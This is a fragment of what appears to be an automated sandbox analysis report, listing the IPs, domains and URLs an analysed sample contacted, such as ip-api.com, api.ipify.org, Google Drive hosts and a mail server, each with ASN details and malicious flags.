  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
142.251.15.139
 drive.google.com United States
15169 GOOGLEUS false
142.250.105.132
 drive.usercontent.google.com United States
15169 GOOGLEUS false
104.26.13.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
drive.google.com 142.251.15.139 true
drive.usercontent.google.com 142.250.105.132 true
api.ipify.org 104.26.13.205 true
ip-api.com 208.95.112.1 true
mail.myhydropowered.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    http://ip-api.com/line/?fields=hosting false
      		high